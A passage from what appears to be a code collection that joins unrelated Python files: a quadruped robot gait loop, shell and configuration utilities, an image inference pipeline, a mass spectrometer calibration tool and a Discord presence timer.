self.target_vel = [0.0, 0.0, 0.0]
self.t_start = [0.0, self.T/2.0, self.T/2.0, 0.0]
self.t_cur_list = [0.0, self.T/2.0, self.T/2.0, 0.0]
self.real_dt = self.dt
self.controll_time = time.time()
dc.setDXL()
dc.torqueON(dc.DXL_ID_LIST)
self.thread = threading.Thread(target=self.trajectoryLoop)
self.thread.start()
def calcBodyVelHorizontal(self):
# ボディ座標系での水平方向速度を計算
rot_inv = self.tIMU.rot.T
vel_world_horizontal = np.array([self.tIMU.v[0], self.tIMU.v[1], 0.0])
vel_body_horizontal = rot_inv@vel_world_horizontal
return vel_body_horizontal
def calcNextLegState(self, vel_body_horizontal, leg_num, t_cur):
p, v, a = lt.calcBalancePVA(
self.leg_cur_states[leg_num],
self.target_vel,
vel_body_horizontal,
self.leg_center[leg_num],
self.body_h,
self.leg_up_h,
self.h_offset,
self.T,
self.dt
)
if(t_cur+self.dt > self.T):
state_next = [p, v, a, 0]
else:
state_next = [p, v, a, t_cur+self.dt]
return state_next
def trajectoryLoop(self):
t = threading.Timer(self.dt, self.trajectoryLoop)
t.start()
time_now = time.time()
self.real_dt = time_now - self.controll_time
vel_b_h = self.calcBodyVelHorizontal()
pos_i = []
for leg_num in range(4):
self.leg_cur_states[leg_num][3] = self.t_cur_list[leg_num]
state_next = self.calcNextLegState(vel_b_h, leg_num, self.t_cur_list[leg_num])
self.theta_list[leg_num], self.pre_theta_flag[leg_num] = IK.legSmartIK(state_next[0], self.theta_pre_list[leg_num], leg_num)
pos_f = dc.DXL_MEDIUM_POSITION_VALUE*np.ones(3) + np.array(self.theta_list[leg_num])*dc.JOINT_DIREC[leg_num]*dc.RAD_2_DXLPOS
pos_i.append(int(pos_f[0]))
pos_i.append(int(pos_f[1]))
pos_i.append(int(pos_f[2]))
self.theta_pre_list[leg_num] = self.theta_list[leg_num]
self.t_cur_list[leg_num] = state_next[3]
dc.syncwritePos(dc.DXL_ID_LIST, pos_i)
self.controll_time = time_now
def main():
leg_centers = [
[0.0, 0.0, -170.0],
[0.0, 0.0, -170.0],
[0.0, 0.0, -170.0],
[0.0, 0.0, -170.0]
]
leg_start_states = [
[[0.0, 0.0, -170.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], 0.0],
[[0.0, 0.0, -170.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], 0.0],
[[0.0, 0.0, -170.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], 0.0],
[[0.0, 0.0, -170.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], 0.0]
]
body_h = 170.0 + IK.sole_r
leg_up_h = 30.0
h_offset = 3.0
T = 0.5
dt = 0.005
tIMU = ti.timerIMU(0.015)
qGait = quadrupedGait(leg_centers, leg_start_states, body_h, leg_up_h, h_offset, T, dt, tIMU)
while(True):
print("-------------------------------")
time.sleep(1)
if __name__ == '__main__':
main()
|
utils.py
|
# encoding: utf-8
from contextlib import contextmanager
import cStringIO
import os
import random
from subprocess import Popen, PIPE, call
import sys
import threading
# ======================= GENERAL UTILILITIES =======================
def extract_column(text, column, start=0, sep=None):
""" Extracts columns from a formatted text
:param text:
:param column: the column number: from 0, -1 = last column
:param start: the line number to start with (headers removal)
:param sep: optional separator between words (default is arbitrary number of blanks)
:return: a list of words
"""
lines = text.splitlines() if isinstance(text, basestring) else text
if start:
lines = lines[start:]
values = []
for line in lines:
elts = line.split(sep) if sep else line.split()
if elts and column < len(elts):
values.append(elts[column].strip())
return values
def filter_column(text, column, start=0, sep=None, **kwargs):
""" Filters (like grep) lines of text according to a specified column and operator/value
:param text: a string
:param column: integer >=0
:param sep: optional separator between words (default is arbitrary number of blanks)
:param kwargs: operator=value eg eq='exact match', contains='substring', startswith='prefix' etc...
:return: a list of split lines
"""
if len(kwargs) != 1:
raise TypeError("Missing or too many keyword parameter in filter_column")
op, value = kwargs.items()[0]
if op in ('eq', 'equals'):
op = '__eq__'
elif op in ('contains', 'includes'):
op = '__contains__'
elif not op in ('startswith', 'endswith'):
raise ValueError("Unknown filter_column operator: {}".format(op))
lines = text.splitlines() if isinstance(text, basestring) else text
if start:
lines = lines[start:]
values = []
for line in lines:
elts = line.split(sep) if sep else line.split()
if elts and column < len(elts):
elt = elts[column]
if getattr(elt, op)(value):
values.append(line.strip())
return values
class ConfAttrDict(dict):
"""
A configuration attribute dictionary with a context manager that allows to push and pull items,
eg for configuration overriding.
"""
class __void__: pass
class __raises__: pass
_raises = __raises__
def __getattr__(self, item):
if item in self:
return self[item]
if self._raises is ConfAttrDict.__raises__:
raise AttributeError("{} attribute not found: {}".format(self.__class__.__name__, item))
return self._raises
def copy(self):
return ConfAttrDict(self)
def update(self, E=None, **F):
dict.update(self, E, **F)
return self
def __iadd__(self, other):
return self.update(other)
def __add__(self, other):
return ConfAttrDict(self).update(other)
def __isub__(self, other):
for k in other:
if k in self:
del self[k]
return self
def __sub__(self, other):
return ConfAttrDict(self).__isub__(other)
def _push(self, **kwargs):
if not hasattr(self, '__item_stack'):
self.__item_stack = []
self.__missing_stack = []
self.__item_stack.append({k: self[k] for k in kwargs if k in self})
kkwargs = kwargs
for k in kwargs:
if kwargs[k] is ConfAttrDict.__void__:
if kkwargs is kwargs:
kkwargs = dict(kwargs)
del kkwargs[k]
if k in self:
del self[k]
self.__missing_stack.append([k for k in kkwargs if k not in self])
return self.update(kkwargs)
def _pull(self):
for k in self.__missing_stack.pop():
del self[k]
return self.update(self.__item_stack.pop())
def __call__(self, **kwargs):
return self._push(**kwargs)
def __enter__(self):
return self
def __exit__(self, *args):
self._pull()
def random_id(len=10):
return ''.join(random.choice('0123456789abcdefghijklmnopqrstuvwxyz') for _ in xrange(len))
def mixin_factory(name, base, *mixins):
return type(name, (base,) + mixins, {})
# ======================= OS RELATED UTILITIES =======================
# this is explicitly borrowed from fabric
def _wrap_with(code):
def inner(text, bold=False):
c = code
if bold:
c = "1;%s" % c
return "\033[%sm%s\033[0m" % (c, text)
return inner
red = _wrap_with('31')
green = _wrap_with('32')
yellow = _wrap_with('33')
blue = _wrap_with('34')
magenta = _wrap_with('35')
cyan = _wrap_with('36')
white = _wrap_with('37')
@contextmanager
def cd(folder):
old_folder = os.getcwd()
yield os.chdir(folder)
os.chdir(old_folder)
COMMAND_DEBUG = None
# COMMAND_DEBUG = 'Debug: '
class Command(object):
""" Use this class if you want to wait and get shell command output
"""
def __init__(self, cmd, show=COMMAND_DEBUG):
self.show = show
self.p = Popen(cmd, shell=True, stdout=PIPE, stderr=PIPE)
self.out_buf = cStringIO.StringIO()
self.err_buff = cStringIO.StringIO()
t_out = threading.Thread(target=self.out_handler)
t_err = threading.Thread(target=self.err_handler)
t_out.start()
t_err.start()
self.p.wait()
t_out.join()
t_err.join()
self.p.stdout.close()
self.p.stderr.close()
self.stdout = self.out_buf.getvalue()
self.stderr = self.err_buff.getvalue()
self.returncode = self.p.returncode
def out_handler(self):
for line in iter(self.p.stdout.readline, ''):
if self.show is not None:
sys.stdout.write(self.show + line)
self.out_buf.write(line)
def err_handler(self):
for line in iter(self.p.stderr.readline, ''):
if self.show is not None:
sys.stderr.write(self.show + 'Error: ' + line)
self.err_buff.write(line)
def stdout_column(self, column, start=0):
return extract_column(self.stdout, column, start)
def command(cmd, raises=False):
""" Use this function if you only want the return code.
You can't retrieve stdout nor stderr and it never raises
"""
ret = call(cmd, shell=True)
if ret and raises:
raise RuntimeError("Error while executing <{}>".format(cmd))
return ret
def command_input(cmd, datain, raises=False):
""" Use this if you want to send data to stdin
"""
p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
p.communicate(datain)
if p.returncode and raises:
raise RuntimeError("Error while executing <{}>".format(cmd))
return p.returncode
def find_file(file, path):
""" returns the first file path found, in the specified path(es).
:param file: an absolute file path or a file name.
:param path: None or string or list, used only if file path is not absolute.
if None or empty string, search in current directory.
if '...', search recursively in current directory and its parents up to but not including '/'.
if string, must be an absolute path to search for file.
if list of strings, search in each specified path (can be '.', '..' or '...')
:return: the first file path found
"""
def check_path(file, path):
if path == '...':
path = os.getcwd()
while path != '/':
f = os.path.join(path, file)
if os.path.isfile(f):
return f, True
path = os.path.dirname(path)
return file, False
else:
f = os.path.join(path, file)
return f, os.path.isfile(f)
if os.path.isabs(file):
return file
path = path or os.getcwd()
if isinstance(path, basestring):
file, is_file = check_path(file, path)
if is_file:
return file
raise RuntimeError("File {} not found".format(file))
else:
for p in path:
f, is_file = check_path(file, p)
if is_file:
return f
raise RuntimeError("File {} not found in {}".format(file, path))
def read_configuration(file, path=None):
""" read configuration from file or string
:param file: a file name or an inline configuration string
:param path: None or sting or list of string.
if '.py' or '.yaml' or '.json', file is interpreted as an inline configuration string,
if string or list of strings, specifies search path(es) for file (current directory if path is None)
:return: a tuple (ConfAttrDict, config file path)
"""
if path in ('.py', '.yaml', '.json'):
data = file
file, ext = 'inline', path
else:
_, ext = os.path.splitext(file)
file = find_file(file, path)
with open(file, 'r') as f:
data = f.read()
if ext == '.py':
conf = ConfAttrDict()
exec(compile(data, file, 'exec'), dict(os.environ), conf)
elif ext in ('.yml', '.yaml'):
import yaml
conf = ConfAttrDict(yaml.load(data))
elif ext == '.json':
try:
import simplejson as json
except ImportError:
import json
conf = ConfAttrDict(json.loads(data))
else:
raise TypeError("Unknown file format %s" % file)
return conf, file
|
inference.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Inference Pipeline.
"""
from __future__ import annotations
import os
import threading
from queue import Queue
from typing import Any
from typing import Optional
from typing import Union
import cv2
import numpy as np
import torch
from torch import Tensor
from torchvision.transforms import functional as F
from onevision.cv import get_image_hw
from onevision.cv import ImageLoader
from onevision.cv import ImageWriter
from onevision.cv import InterpolationMode
from onevision.cv import resize
from onevision.cv import to_image
from onevision.factory import INFERENCES
from onevision.file import create_dirs
from onevision.nn.model.utils import get_next_version
from onevision.type import Arrays
from onevision.type import Int2T
from onevision.type import Int3T
from onevision.utils import console
from onevision.utils import progress_bar
from onevision.utils import select_device
__all__ = [
"Inference"
]
# MARK: - Inference
# noinspection PyMethodMayBeStatic
@INFERENCES.register(name="inferences")
class Inference:
"""Inference class defines the prediction loop for image data: images,
folders, video, etc.
Attributes:
default_root_dir (str):
Root dir to save predicted data.
output_dir (str):
Output directory to save predicted images.
model (nn.Module):
Model to run.
data (str):
Data source. Can be a path or pattern to image/video/directory.
data_loader (Any):
Data loader object.
shape (tuple, optional):
Input and output shape of the image as [H, W, C]. If `None`,
use the input image shape.
batch_size (int):
Batch size. Default: `1`.
device (int, str, optional):
Will be mapped to either gpus, tpu_cores, num_processes or ipus,
based on the accelerator type.
verbose (bool):
Verbosity mode. Default: `False`.
save_image (bool):
Save predicted images. Default: `False`.
"""
# MARK: Magic Functions
def __init__(
self,
default_root_dir: str,
version : Union[int, str, None] = None,
shape : Optional[Int3T] = None,
batch_size : int = 1,
device : Union[int, str, None] = 0,
verbose : bool = True,
save_image : bool = False,
*args, **kwargs
):
super().__init__()
self.default_root_dir = default_root_dir
self.shape = shape
self.batch_size = batch_size
self.device = select_device(device=device)
self.verbose = verbose
self.save_image = save_image
self.model = None
self.data = None
self.data_loader = None
self.image_writer = None
self.init_output_dir(version=version)
# MARK: Configure
def init_output_dir(self, version: Union[int, str, None] = None):
"""Configure output directory base on the given version.
Args:
version (int, str, optional):
Experiment version. If version is not specified the logger
inspects the save directory for existing versions, then
automatically assigns the next available version. If it is a
string then it is used as the run-specific subdirectory name,
otherwise `version_${version}` is used.
"""
if version is None:
version = get_next_version(root_dir=self.default_root_dir)
if isinstance(version, int):
version = f"version_{version}"
version = version.lower()
self.output_dir = os.path.join(self.default_root_dir, version)
console.log(f"Output directory at: {self.output_dir}.")
def init_data_loader(self):
"""Configure the data loader object."""
self.data_loader = ImageLoader(
data=self.data, batch_size=self.batch_size
)
def init_data_writer(self):
"""Configure the data writer object."""
self.image_writer = ImageWriter(dst=self.output_dir)
def validate_attributes(self):
"""Validate all attributes' values before run loop start."""
if self.model is None:
raise ValueError(f"`model` must be defined.")
if self.data_loader is None:
raise ValueError(f"`data_loader` must be defined.")
if self.save_image and self.image_writer is None:
raise ValueError(f"`image_writer` must be defined.")
# MARK: Run
def run(self, model: Any, data: str):
"""Main prediction loop.
Args:
model (nn.Module):
Model to run.
data (str):
Data source. Can be a path or pattern to image/video/directory.
"""
self.model = model
self.data = data
self.run_routine_start()
# NOTE: Mains loop
with progress_bar() as pbar:
for batch_idx, batch in pbar.track(
enumerate(self.data_loader),
total=len(self.data_loader),
description=f"[bright_yellow]{self.model.fullname}"
):
images, indexes, files, rel_paths = batch
input, size0, size1 = self.preprocess(images)
pred = self.model.forward(input)
results = self.postprocess(pred, size0, size1)
if self.verbose:
self.show_results(results=results)
if self.save_image:
self.image_writer.write_images(
images=results, image_files=rel_paths
)
self.run_routine_end()
def run_routine_start(self):
"""When run routine starts we build the `output_dir` on the fly."""
create_dirs(paths=[self.output_dir])
self.init_data_loader()
self.init_data_writer()
self.validate_attributes()
self.model.to(self.device)
self.model.eval()
if self.verbose:
cv2.namedWindow(
"results", cv2.WINDOW_AUTOSIZE | cv2.WINDOW_KEEPRATIO
)
def preprocess(self, images: Arrays) -> tuple[Tensor, Int2T, Int2T]:
"""Preprocessing input.
Args:
images (Arrays):
Input images as [B, H, W, C].
Returns:
x (Tensor):
Input image as [B, C H, W].
size0 (Int2T):
The original images' sizes.
size1 (Int2T):
The resized images' sizes.
"""
# NOTE: THIS PIPELINE IS FASTER
size0 = get_image_hw(images)
if self.shape:
images = [resize(i, self.shape) for i in images]
images = [F.to_tensor(i) for i in images]
images = torch.stack(images)
size1 = get_image_hw(images)
images = images.to(self.device)
"""
# NOTE: THIS PIPELINE IS SLOWER
size0 = get_image_size(images)
images = [torchvision.transforms.ToTensor()(i) for i in images]
images = torch.stack(images)
images = images.to(self.device)
if self.shape:
images = resize(images, self.shape)
# images = [resize(i, self.shape) for i in images]
size1 = get_image_size(images)
"""
return images, size0, size1
def postprocess(
self, results: Tensor, size0: Int2T, size1: Int2T
) -> np.ndarray:
"""Postprocessing results.
Args:
results (Tensor):
Output images.
size0 (Int2T):
The original images' sizes.
size1 (Int2T):
The resized images' sizes.
Returns:
results (np.ndarray):
Post-processed output images as [B, H, W, C].
"""
# For multi-stages models, we only get the last pred
if isinstance(results, (list, tuple)):
results = results[-1]
results = to_image(results, denormalize=True) # List of 4D-array
if size0 != size1:
results = resize(
results, size0, interpolation=InterpolationMode.CUBIC
)
return results
def run_routine_end(self):
"""When run routine ends we release data loader and writers."""
self.model.train()
if self.verbose:
cv2.destroyAllWindows()
# MARK: Visualize
def show_results(self, results: np.ndarray):
"""Show results.
Args:
results (np.ndarray):
Post-processed output images as [B, H, W, C].
"""
for i in results:
cv2.imshow("results", i)
cv2.waitKey(1)
# MARK: - MultiThreadInference
@INFERENCES.register(name="multithread_inference")
class MultiThreadInference(Inference):
"""Multi-Thread Inference class defines the prediction loop for image data:
images, folders, video, etc.
Attributes:
default_root_dir (str):
Root dir to save predicted data.
output_dir (str):
Output directory to save predicted images.
model (nn.Module):
Model to run.
data (str):
Data source. Can be a path or pattern to image/video/directory.
data_loader (Any):
Data loader object.
shape (tuple, optional):
Input and output shape of the image as [H, W, C]. If `None`,
use the input image shape.
batch_size (int):
Batch size. Default: `1`.
device (int, str, optional):
Will be mapped to either gpus, tpu_cores, num_processes or ipus,
based on the accelerator type.
queue_size (int):
verbose (bool):
Verbosity mode. Default: `False`.
save_image (bool):
Save predicted images. Default: `False`.
"""
# MARK: Magic Functions
def __init__(
self,
default_root_dir: str,
version : Union[int, str, None] = None,
shape : Optional[Int3T] = None,
batch_size : int = 1,
device : Union[int, str, None] = 0,
queue_size : int = 10,
verbose : bool = True,
save_image : bool = False,
*args, **kwargs
):
super().__init__(
default_root_dir = default_root_dir,
version = version,
shape = shape,
batch_size = batch_size,
device = device,
queue_size = queue_size,
verbose = verbose,
save_image = save_image,
*args, **kwargs
)
self.pbar = None
self.task = None
self.queue_size = queue_size
# NOTE: Queue
self.frames_queue = Queue(maxsize=self.queue_size)
self.input_queue = Queue(maxsize=self.queue_size)
self.pred_queue = Queue(maxsize=self.queue_size)
self.results_queue = Queue(maxsize=self.queue_size)
# MARK: Run
def run(self, model: Any, data: str):
"""Main prediction loop.
Args:
model (nn.Module):
Model to run.
data (str):
Data source. Can be a path or pattern to image/video/directory.
"""
self.model = model
self.data = data
self.run_routine_start()
# NOTE: Thread for data reader
thread_data_reader = threading.Thread(target=self.run_data_reader)
thread_data_reader.start()
# NOTE: Thread for pre-process
thread_preprocess = threading.Thread(target=self.run_preprocess)
thread_preprocess.start()
# NOTE: Thread for model
thread_model = threading.Thread(target=self.run_model)
thread_model.start()
# NOTE: Thread for post-process
thread_postprocess = threading.Thread(target=self.run_postprocess)
thread_postprocess.start()
# NOTE: Thread for result writer
thread_result_writer = threading.Thread(target=self.run_result_writer)
thread_result_writer.start()
# NOTE: Joins threads when all terminate
thread_data_reader.join()
thread_preprocess.join()
thread_model.join()
thread_postprocess.join()
thread_result_writer.join()
self.run_routine_end()
def run_routine_start(self):
"""When run routine starts we build the `output_dir` on the fly."""
create_dirs(paths=[self.output_dir])
self.init_data_loader()
self.init_data_writer()
self.validate_attributes()
self.model.to(self.device)
self.model.eval()
self.pbar = progress_bar()
with self.pbar:
self.task = self.pbar.add_task("Inferring", total=len(self.data_loader))
if self.verbose:
cv2.namedWindow(
"results", cv2.WINDOW_AUTOSIZE | cv2.WINDOW_KEEPRATIO
)
def run_data_reader(self):
"""Run data reader thread and push images and frame_indexes to queue.
"""
for images, indexes, files, rel_paths in self.data_loader:
if len(indexes) > 0:
# NOTE: Push frame index and images to queue
self.frames_queue.put([images, indexes, files, rel_paths])
# NOTE: Push None to queue to act as a stopping condition for next
# thread
self.frames_queue.put([None, None, None, None])
def run_preprocess(self):
"""Run pre-processing thread and push input to queue."""
while True:
# NOTE: Get frame indexes and images from queue
(images, indexes, files, rel_paths) = self.frames_queue.get()
if indexes is None:
break
# NOTE: Pre-processing images
images, size0, size1 = self.preprocess(images)
# NOTE: Push input to queue
self.input_queue.put([images, indexes, files, rel_paths, size0, size1])
# NOTE: Push None to queue to act as a stopping condition for next
# thread
self.input_queue.put([None, None, None, None, None, None])
def run_model(self):
"""Run model thread and push pred to queue."""
while True:
# NOTE: Get input from queue
(input, indexes, files, rel_paths, size0, size1) = self.input_queue.get()
if indexes is None:
break
# NOTE: Detect batch of inputs
preds = self.model.forward(input)
# NOTE: Push predictions to queue
self.pred_queue.put([preds, indexes, files, rel_paths, size0, size1])
# NOTE: Push None to queue to act as a stopping condition for next
# thread
self.pred_queue.put([None, None, None, None, None, None])
def run_postprocess(self):
"""Run post-processing thread and push results to queue."""
while True:
# NOTE: Get predictions from queue
(preds, indexes, files, rel_paths, size0, size1) = self.pred_queue.get()
if indexes is None:
break
# NOTE: Post-processing images
results = self.postprocess(preds, size0, size1)
# NOTE: Push results to queue
self.results_queue.put([results, indexes, files, rel_paths])
with self.pbar:
self.pbar.update(self.task, advance=1)
# NOTE: Push None to queue to act as a stopping condition for next
# thread
self.results_queue.put([None, None, None, None])
def run_result_writer(self):
"""Run result writing thread."""
while True:
# NOTE: Get predictions from queue
(results, indexes, files, rel_paths) = self.results_queue.get()
if indexes is None:
break
if self.verbose:
self.show_results(results=results)
if self.save_image:
self.image_writer.write_images(
images=results, image_files=rel_paths
)
def run_routine_end(self):
"""When run routine ends we release data loader and writers."""
self.model.train()
if self.verbose:
cv2.destroyAllWindows()
# MARK: Visualize
def show_results(self, results: np.ndarray):
"""Show results.
Args:
results (np.ndarray):
Post-processed output images as [B, H, W, C].
"""
for i in results:
cv2.imshow("results", i)
cv2.waitKey(1)
|
mass_calibrator.py
|
# ===============================================================================
# Copyright 2013 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
from traits.api import (
HasTraits,
Float,
Int,
List,
Str,
Any,
Event,
Property,
on_trait_change,
Range,
)
from traitsui.api import (
View,
Item,
HGroup,
spring,
EnumEditor,
ButtonEditor,
Group,
TextEditor,
)
# ============= standard library imports ========================
from numpy import array, hstack, Inf, savetxt
import csv
import os
from threading import Thread
import struct
# ============= local library imports ==========================
from pychron.core.helpers.filetools import unique_path
from pychron.core.helpers.isotope_utils import sort_isotopes
from pychron.paths import paths
from pychron.spectrometer.jobs.magnet_sweep import MagnetSweep
from pychron.core.stats.peak_detection import (
find_peaks,
calculate_peak_center,
PeakCenterError,
)
from pychron.core.ui.gui import invoke_in_main_thread
import six
from six.moves import zip
DELTA_TOOLTIP = """The minimum difference between a peak and
the following points, before a peak may be considered a peak"""
class CalibrationPeak(HasTraits):
isotope = Str("Ar40")
dac = Float
isotopes = List
ruler = Any
class MassCalibratorSweep(MagnetSweep):
db = Any
start_dac = Float(4)
stop_dac = Float(8.0)
step_dac = Float(0.1)
period = 10
calibration_peaks = List
selected = Any
# peak detection tuning parameters
min_peak_height = Float(1)
min_peak_separation = Range(0.0001, 1000)
# if the next point is less than delta from the current point than this is not a peak
# essentially how much does the peak stand out from the background
delta = Float(1)
fperiod = Int(50)
fwindow = Float(1)
fstep_dac = Float(0.1)
fexecute_button = Event
fexecute_label = Property(depends_on="_alive")
fine_scan_enabled = Property(depends_on="calibration_peaks:isotope")
_fine_scanning = False
def setup_graph(self):
g = self.graph
g.new_plot()
g.set_x_title("DAC")
g.new_series()
mi = min(self.start_dac, self.stop_dac)
ma = max(self.start_dac, self.stop_dac)
g.set_x_limits(min_=mi, max_=ma, pad="0.1")
def _fine_scan(self):
operiod = self.period
self.period = self.fperiod
self._fine_scanning = True
i = 1
self.graph.new_plot(padding_top=10, xtitle="Relative DAC")
w = self.fwindow / 2.0
self.graph.set_x_limits(min_=-w, max_=w, plotid=1)
self._redraw()
for cp in self.calibration_peaks:
if not cp.isotope:
continue
if self.isAlive():
self.selected = cp
self.info(
"Fine scan calibration peak {}. {} dac={}".format(
i, cp.isotope, cp.dac
)
)
self._fine_scan_peak(cp)
i += 1
self.period = operiod
self._fine_scanning = False
if self.isAlive():
if self.confirmation_dialog("Save to Database"):
self._save_to_db()
if self.confirmation_dialog("Apply Calibration"):
self._apply_calibration()
def _pack(self, d):
data = "".join([struct.pack(">ff", x, y) for x, y in d])
return data
def _save_to_db(self):
db = self.db
spectrometer = "Obama"
hist = db.add_mass_calibration_history(spectrometer)
# add coarse scan
d = self._get_coarse_data()
data = self._pack(d)
db.add_mass_calibration_scan(hist, blob=data)
# add fine scans
plot = self.graph.plots[1]
cps = [cp for cp in self.calibration_peaks if cp.isotope]
for cp, ki in zip(cps, sorted(plot.plots.keys())):
p = plot.plots[ki][0]
xs = p.index.get_data()
ys = p.value.get_data()
d = array((xs, ys)).T
data = self._pack(d)
db.add_mass_calibration_scan(
hist,
cp.isotope,
blob=data,
center=cp.dac,
)
db.commit()
def _apply_calibration(self):
"""
save calibration peaks as mag field table
"""
p = os.path.join(paths.spectrometer_dir, "mftable.csv")
with open(p, "w") as wfile:
writer = csv.writer(wfile, delimiter=",")
for cp in self.calibration_peaks:
if cp.isotope:
writer.writerow([cp.isotope, cp.dac])
def _fine_scan_peak(self, cp):
line, _ = self.graph.new_series(plotid=1)
c = cp.dac
w = self.fwindow / 2.0
steps = self._calc_step_values(c - w, c + w, self.fstep_dac)
self._scan_dac(steps)
# get last scan
xs = line.index.get_data()
ys = line.value.get_data()
try:
center = calculate_peak_center(xs, ys)
# if not isinstance(center, str):
[lx, cx, hx], [ly, cy, hy], mx, my = center
self.graph.add_vertical_rule(cx, plotid=1)
self.info(
"new peak center. {} nominal={} dx={}".format(cp.isotope, cp.dac, cx)
)
cp.dac += cx
self._redraw()
except PeakCenterError as e:
self.warning(e)
# else:
# self.warning(center)
def _update_graph_data(self, *args, **kw):
"""
add and scale scans
"""
if self._fine_scanning:
self._update_fine_graph_data(*args, **kw)
else:
super(MassCalibratorSweep, self)._update_graph_data(*args, **kw)
def _update_fine_graph_data(self, plot, di, intensities, **kw):
# print di, intensities
# convert dac to a relative dac
di -= self.selected.dac
ks = sorted(plot.plots.keys())
cur = plot.plots[ks[-1]][0]
if hasattr(cur, "odata"):
oys = getattr(cur, "odata")
oys = hstack((oys, intensities[:1]))
else:
oys = array(intensities)
setattr(cur, "odata", oys)
xs = cur.index.get_data()
xs = hstack((xs, di))
cur.index.set_data(xs)
_R = -Inf
# get the max range and normalize all series
for p in six.itervalues(plot.plots):
p = p[0]
high, low = max(p.odata), min(p.odata)
tR = high - low
if tR > _R:
_R = tR
miR = low
for p in six.itervalues(plot.plots):
p = p[0]
oys = p.odata
high, low = max(p.odata), min(p.odata)
r = high - low
if r:
oys = (oys - low) * _R / r + miR
p.value.set_data(oys)
def _fine_graph_hook(self, *args, **kw):
plot = self.graph.plots[1]
self._update_graph_data(plot, *args, **kw)
def _graph_hook(self, *args, **kw):
if self._fine_scanning:
self._fine_graph_hook(*args, **kw)
else:
super(MassCalibratorSweep, self)._graph_hook(*args, **kw)
def _dump_scan(self):
root = os.path.join(paths.data_dir, "mass_calibration_scans")
if not os.path.isdir(root):
os.mkdir(root)
p, _ = unique_path(root, "scan")
d = self._get_coarse_data()
savetxt(p, d)
def _get_coarse_data(self):
"""
return coarse scan as (dac,intensity) pairs
"""
data = self.graph.plots[0].data
xs = data.get_data("x0")
ys = data.get_data("y0")
return array((xs, ys)).T
def _find_peaks(self):
if self.graph.plots:
# clear peaks
self.graph.remove_rulers()
data = self.graph.plots[0].data
xs = data.get_data("x0")
ys = data.get_data("y0")
if len(xs) and len(ys):
lookahead = max(1, int(self.min_peak_separation / self.fstep_dac))
mxp, mip = find_peaks(ys, xs, lookahead=lookahead, delta=self.delta)
pks = []
isos = list(self.spectrometer.molecular_weights.keys())
isos = sort_isotopes(isos)
for dac, v in mxp:
if v > self.min_peak_height:
l = self.graph.add_vertical_rule(dac)
pks.append(CalibrationPeak(dac=dac, isotopes=isos, ruler=l))
self.calibration_peaks = pks
self._redraw()
def _set_x_limits(self):
if self.graph:
mi = min(self.start_dac, self.stop_dac)
ma = max(self.start_dac, self.stop_dac)
self.graph.set_x_limits(min_=mi, max_=ma, pad="0.1")
def _redraw(self):
invoke_in_main_thread(self.graph.redraw)
def _execute(self):
self.spectrometer.magnet.settling_time = 0.001
sm = self.start_dac
em = self.stop_dac
stm = self.step_dac
self.verbose = True
if abs(sm - em) > stm:
# do initial scan
self._do_sweep(sm, em, stm, map_mass=False)
self._alive = False
# write data to file for testing
self._dump_scan()
# find peaks
self._find_peaks()
self._post_execute()
self.verbose = False
def _end(self):
self._fine_scanning = False
# ===================================================================================================================
# handlers
# ===================================================================================================================
@on_trait_change("min_peak_height, min_peak_separation, delta")
def _handle_peak_detection_change(self):
self._find_peaks()
def _fexecute_button_fired(self):
if self.isAlive():
self.stop()
self._end()
else:
self._alive = True
t = Thread(name="fine scan", target=self._fine_scan)
t.start()
def _selected_changed(self):
for p in self.calibration_peaks:
ruler = p.ruler
ruler.line_width = 1
ruler.color = (1.0, 0, 0)
if self.selected:
self.selected.ruler.line_width = 5
self.selected.ruler.color = (0, 1.0, 0)
self.graph.redraw()
def _start_dac_changed(self):
self._set_x_limits()
def _stop_dac_changed(self):
self._set_x_limits()
def traits_view(self):
coarse_grp = Group(
Item("reference_detector", editor=EnumEditor(name="detectors")),
Item("start_dac", label="Start"),
Item("stop_dac", label="Stop"),
Item("step_dac", label="Step"),
Item("period", label="Scan Period (ms)"),
HGroup(
spring,
Item(
"execute_button",
editor=ButtonEditor(label_value="execute_label"),
show_label=False,
),
),
label="Coarse",
)
peak_detection_grp = Group(
Item("min_peak_height", label="Min. Height (fA)"),
Item(
"min_peak_separation",
label="Min. Separation (V)",
editor=TextEditor(evaluate=float),
),
Item("delta", tooltip=DELTA_TOOLTIP),
label="Peak Detection",
)
fine_grp = Group(
Item("fwindow", label="Window (V)", tooltip="+/- volts centered at peak_i"),
Item(
"fperiod",
label="Scan Period (ms)",
tooltip="fine scan integration time",
),
HGroup(
spring,
Item(
"fexecute_button",
editor=ButtonEditor(label_value="fexecute_label"),
show_label=False,
),
),
label="Fine",
enabled_when="fine_scan_enabled",
)
v = View(Group(coarse_grp, peak_detection_grp, fine_grp, layout="tabbed"))
return v
def _get_fine_scan_enabled(self):
return len([cp for cp in self.calibration_peaks if cp.isotope]) > 2
def _get_fexecute_label(self):
return "Stop" if self.isAlive() else "Start"
# ============= EOF =============================================
|
pomo.py
|
import threading
from pypresence import Presence
import time
from tkinter import *
from tkinter.ttk import *
# Creating and connecting presence
rpc = Presence(client_id="857867709618061324")
rpc.connect()
def window():
"""
Tkinter window initialisation
"""
# Create Object
root = Tk()
# Initialize tkinter window with dimensions
root.geometry('600x500')
# Create button
btn = Button(root, text='Click me!',
command=lambda: threading.Thread(target=buttonOne).start())
# Set the position of button on the top of window
btn.pack(side='top')
root.mainloop()
def buttonOne():
"""
Used to call display from thread start
:return: None
"""
display()
return
def display():
"""
Displays rich presence details
"""
while True: # The presence will stay on as long as the program is running
current_time = int(time.time())
minutes = 1
hours_added = current_time + (minutes * 60)
rpc.update(state="fun", details="playing", end=hours_added,
large_image="307485929256211") # Set the presence
time.sleep(minutes * 60) # Sleep for length of end time
break
if __name__ == "__main__":
window()
|
startDask.py
|
# original source code is from "Azure Machine Learning examples" repo.
